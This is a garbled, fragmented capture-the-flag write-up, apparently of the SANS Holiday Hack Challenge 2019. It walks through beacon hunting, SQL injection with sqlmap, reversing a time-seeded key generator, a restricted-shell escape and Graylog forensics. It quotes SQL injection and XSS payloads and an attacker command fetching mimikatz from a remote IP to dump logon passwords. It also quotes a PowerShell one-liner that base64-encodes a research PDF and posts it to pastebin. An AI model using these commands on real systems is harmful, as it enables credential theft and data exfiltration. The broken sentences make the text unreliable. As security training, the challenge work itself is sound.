supatree
there were 77 attempts to login, but only 76 of them failed. It means the attacker got in. docker-compose
(on Mac). For that we need to clone https://github.com/activecm/rita
and put the unzipped 'elfu-zeeklogs' to that folderrita/etc/rita.yaml
-> uncomment a few thingsrita/docker-compose.yaml
-> add the pathsshow-beacons
helps find IPs that excibit C2 behavior.stoq
with Splunk queryresults{}.workers.smtp.body
and find something interesting.results{}.archivers.filedir.path
. If we look at path /home/ubuntu/archive/f/f/1/e/a/ff1ea6f13be3faabd0da728f514deb7fe3577cc4
in the "File Archive" section of splink, we discover thath this filecontains the answer:image classifier
for our machine learning needs. We want ml5
variable to live in the browser console, so will load the script.build_images
is overriden to call our capteha breating function. spam()
function that sent 100 contest entries.email
to text
. zz
as an email to check, it redirects is to an weird looking url: https://studentportal.elfu.org/validator.php
to get the token before submission. Continue to experiment with email field, enter ' union select * from lol #
as elfmail, and an error is diplayed! elfu
. What if we try krampus? ' union select * from krampus #
results in a different error! elfu
, table krampus
.d@efe.com' union select 0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e #
gives us this.&token=
needs to be urlencoded, as well as the elfmail itself. We will need a custom tamper script.lol
, target database elfu
table krampus
. Url encoding needs to be skipped because we encode things in a custom way in our tamper script. Also, from our previous experiments we know that Union based and Error based sqli techniques work. sub_401E60
, sub_401D90
and sub_401DC0
(inside the loop that iterates 8 times, key length confirmed!).sub_401E60
Windows _time64
function is used. It generates a timestamp in seconds of current system time. Looks like the seed to "random" key generator is this timestamp. The result of _time64
is in eax
register, which then gets saved by the original caller on stack as an argument for sub_401D90
sub_401D90
we print the timestamp and eventually save it to dword_40602C
memory location.sub_401DC0
gets called inside the loop. It acts like a random number generator. It takes whatever is at dword_40602C
and does some math to it, and puts it back to dword_40602C
. On the first iteration of the loop the result of _time64
is processed. On further iterations dword_40602C
contains the result of previous iteration. sub_401DC0
returns, the lower byte of the result al
is moved to appropriate slot in the key array --> [ebp+arg_0]
is the address of the beginning of array, [ebp+var_4]
is the current offset (it gets incremented in the loop). sub_401DC0
, 214013, it leads us to Rosetta Code, Linear Congruential Generator.brute()
takes 3 minues to execute. Here is the first page of the decrypted document!https://sleighworkshopdoor.elfu.org/
. I was using Chromium based Brave browser.Command + Option + i
to open Dev Tools on Mac.File -> Print
head
to expand ithead
-> look at style
tagCommand + F
in the Elements Tab of Dev Tools. We look for 'eggs' and then click the Event Listeners
tab on the bottomcss -> styles.css
and Command + F
to look for 'active'macaroni
,swab
, and gnome
inside lock10. And drag the cover
div down.srf.elfu.org
/etc/passwd
, let's check that in logsq
cat
the file Kent mentioned, we see the firewall config requirements.lol.sh
with all requirements in the right order.['1373', '1733', '3137', '3371', '7331' ]
. Code 7331
worked!home
folder. Let's see what's wrong with ls
and which binary is used.ls
binary. The $PATH
forces to call anything at /usr/local/bin
first before checking other locations. No worries, we will explicitely call ls
from the bin
folder./etc/passwd
/bin/nsh
. And we can use chattr
to potentially change the nyanshell's attributes. Let's see what attibutes it has first./bin/nsh
is immutable. We can change that, and then override nsh
with the contents of bash
binary.ps
command to figure out on which port the database is running. Let's use -a
flag to see all processes and -x
flag to see processes not attached to the terminal.elfu
database sounds like it is university related, so the professor might put the solution here. https://trail.elfu.org
, which can be discovered in the Network Tab of browser Dev Tools upon the terminal opening. Like Chris suggested in the video, let's look at the page source and see if we can find anything.#statusContainer
270660
. Then we get MD5 hash of 270660
, which is 89a8ba25755f8733d773e708ad16020a
, and add that value to appropriate place.https://graylog.elfu.org/
and fill out the report at https://report.elfu.org/
. To find these URLs we look at the GET requests in Network Tab of Dev Tools upon opening the terminal.EventID:2 AND TargetFilename:/.*cookie.*/ AND ProcessImage:/.*firefox.*/
ProcessImage:/.*cookie_recipe\.exe/ AND EventID:3
EventID:1 AND ParentProcessImage:/.*cookie_recipe\.exe/ AND CommandLine:/.*\/c.*/
C:\Windows\system32\cmd.exe /c "whoami "
will be on top.ParentProcessImage:/.*cookie_recipe\.exe/ AND CommandLine:/.*service.*/
/.*mimikatz.*/
C:\Windows\system32\cmd.exe /c "Invoke-WebRequest -Uri http://192.168.247.175/mimikatz.exe -OutFile C:\cookie.exe "
and then ran it: C:\cookie.exe" privilege::debug sekurlsa::logonpasswords exit
EventID:4624 AND SourceNetworkAddress:192.168.247.175
EventID:4624 AND LogonType:10
SourceHostName:ELFU-RES-WKS2 AND _exists_:LogonType AND _exists_:DestinationHostname
ELFU-RES-WKS2
. We also know that any file system navigation happenned after 2019-11-19 06:04:28, so will set time selector to "from" 2019-11-19 06:04:29 "to" 2019-11-19 06:24:00 and search for all logs that have any DestinationHostname and LogonType. The query returns 4 results. All these results have LogonType 3 and DestinationHostname elfu-res-wks3
EventID:2 AND TargetFilename:/.*research.*/
CommandLine: /.*POST.*/
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest -Uri https://pastebin.com/post.php -Method POST -Body @{ "submit_hidden" = "submit_hidden"; "paste_code" = $([Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf"))); "paste_format" = "1"; "paste_expire_date" = "N"; "paste_private" = "0"; "paste_name"="cookie recipe" }
.Very soon after that the POST request will be executed, so we click on "show surrounding messages" -> 5 seconds. Only one new entry will show up. It will be with EventID 3, Network Connection and DestinationHostName "pastebin", its DestinationIp is the answer. riddles
that give us hints about which PowerShell commands to use.angle
value we look for! Also lets have a closer look at entry number 9.riddle
gives us detiailed instructions of what to do next.Refraction
is found!temperature
./shall/see
leads to another riddle.grep
, you are being missed.conn.log
by duration.